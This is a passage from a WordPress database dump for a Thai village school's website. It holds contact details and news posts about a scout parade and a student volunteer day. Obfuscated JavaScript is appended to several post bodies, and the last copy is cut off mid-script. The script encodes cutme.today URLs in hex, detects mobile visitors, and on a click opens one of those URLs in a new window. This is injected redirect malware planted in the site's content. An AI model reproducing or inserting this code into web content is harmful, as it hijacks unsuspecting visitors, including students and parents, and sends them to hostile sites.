{\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนบ้านหนองปลาเข็ง-กอไหล่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">ตำบล โพธิ์ อำเภอ โนนคูณ ศรีสะเกษ 33250</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ :  093-325-2659 ผู้อำนวยการโรงเรียน</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-31 11:33:14','2024-07-31 04:33:14','',14,'http://pakhaeng.ssk.in.th/?p=309',0,'revision','',0),
(311,1,'2024-07-31 21:46:36','2024-07-31 14:46:36','','1 กรกฏาคม วันสถาปนาลูกเสือแห่งชาติ ประวัติและความเป็นมา','','inherit','','closed','','1-%e0%b8%81%e0%b8%a3%e0%b8%81%e0%b8%8f%e0%b8%b2%e0%b8%84%e0%b8%a1-%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%96%e0%b8%b2%e0%b8%9b%e0%b8%99%e0%b8%b2%e0%b8%a5%e0%b8%b9%e0%b8%81%e0%b9%80%e0%b8%aa','','','2024-07-31 21:46:36','2024-07-31 14:46:36','',292,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/1-กรกฏาคม-วันสถาปนาลูกเสือแห่งชาติ-ประวัติและความเป็นมา.gif',0,'attachment','image/gif',0),
(313,1,'2024-07-31 21:47:42','2024-07-31 14:47:42','<!-- wp:paragraph -->\n<p>วันที่ 1 กรกฎาคม พ.ศ.2567 นางเสน่หา พลโสภา ผู้อำนวยการโรงเรียนบ้านหนองปลาเข็ง กอไหล่ เป็นประธานในพิธีทบทวนคำปฏิญาณและสวนสนามลูกเสือ เนื่องในวันคล้ายวันสถาปนาคณะลูกเสือแห่งชาติประจำปี 2567 ณ สนามโรงเรียนบ้านหนองปลาเข็ง กอไหล่ โดยมีผู้บังคับบัญชาลูกเสือ เข้าร่วมทำพิธีเพื่อน้อมรำลึกในพระมหากรุณาธิคุณในพระบาทสมเด็จพระมงกุฏเกล้าเจ้าอยู่หัว ผู้พระราชทานกำเนิดลูกเสือไทย และแสดงความจงรักภักดีแด่พระประมุขคณะลูกเสือแห่งชาติ</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:video {\"id\":278} -->\n<figure class=\"wp-block-video\"><video autoplay controls src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/สวนสนาม.mp4\"></video></figure>\n<!-- /wp:video -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วิดีโอกิจกรรมพิธีทบทวนคำปฏิญาณและสวนสนามลูกเสือ','','inherit','closed','closed','','275-revision-v1','','','2024-07-31 21:47:42','2024-07-31 14:47:42','',275,'http://pakhaeng.ssk.in.th/?p=313',0,'revision','',0),
(314,1,'2024-07-31 21:48:36','2024-07-31 14:48:36','','จิตอาสา','','inherit','','closed','','%e0%b8%88%e0%b8%b4%e0%b8%95%e0%b8%ad%e0%b8%b2%e0%b8%aa%e0%b8%b2-2','','','2024-07-31 21:48:36','2024-07-31 14:48:36','',285,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/จิตอาสา.gif',0,'attachment','image/gif',0),
(315,1,'2024-07-31 21:48:48','2024-07-31 14:48:48','<!-- wp:paragraph -->\n<p><strong>วันที่ 29 มิถุนายน พ.ศ. 2567 โรงเรียนบ้านหนองปลาเข็ง กอไหล่ โดยนางเสน่หา พลโสภา ผู้อำนวยการโรงเรียน พร้อมด้วยคณะครูและบุคลากรทางการศึกษา ให้การต้อนรับนักเรียนโรงเรียนกันทรลักษ์วิทยา ที่มาจัด กิจกรรมเพื่อพัฒนาโรงเรียน พร้อมด้วยนักเรียน ชั้น ป.6 โรงเรียนบ้านหนองปลาเข็ง กอไหล่ ร่วมกันทำความสะอาด ทาสี และวาดภาพ ทางโรงเรียนฯ ขอขอบคุณนักเรียนจากโรงเรียนกันทรลักษ์วิทยา ที่มาจัดกิจกรรมดี ๆ เพื่อน้อง ๆ โรงเรียนบ้านหนองปลาเข็ง กอไหล่ มา ณ ในโอกาสนี้</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:video {\"id\":286} -->\n<figure class=\"wp-block-video\"><video autoplay controls src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/จิตอาสา.mp4\"></video></figure>\n<!-- /wp:video -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const 